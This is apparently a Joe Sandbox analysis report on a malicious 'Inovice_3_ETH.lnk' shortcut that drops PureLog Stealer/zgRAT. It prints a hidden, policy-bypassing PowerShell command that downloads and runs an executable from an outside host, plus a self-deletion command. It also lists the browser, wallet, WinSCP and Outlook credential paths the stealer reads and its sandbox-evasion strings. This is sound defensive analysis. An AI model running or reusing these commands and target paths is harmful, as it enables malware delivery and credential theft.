Source: C:\Users\user\AppData\Roaming\svhosts.exe	Memory allocated: 1A7A0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4711	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5171	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Window / User API: threadDelayed 7190	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Window / User API: threadDelayed 2734	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4119	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5669	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe TID: 7600	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep count: 4119 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044	Thread sleep count: 5669 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\svhosts.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000000.00000002.1770345569.000001F3F026F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen2y
Source: svhosts.exe, 00000002.00000002.2064677835.0000000000A32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7332.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\svhosts.exe "C:\Users\user\AppData\Roaming\svhosts.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 10; Remove-Item -Path 'C:\Users\user\AppData\Roaming\svhosts.exe' -Force			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://fermazapoved.ru/images/sys.exe','c:\users\user\appdata\roaming\svhosts.exe');start-process 'c:\users\user\appdata\roaming\svhosts.exe'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Queries volume information: C:\Users\user\AppData\Roaming\svhosts.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svhosts.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: powershell.exe, 00000000.00000002.1773813658.00007FFD9BA70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\svhosts.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svhosts.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svhosts.exe PID: 7548, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svhosts.exe.1bd80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2281318618.000000001BD80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	41 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	331 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	11 Process Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	51 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Inovice_3_ETH.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Inovice_3_ETH.lnk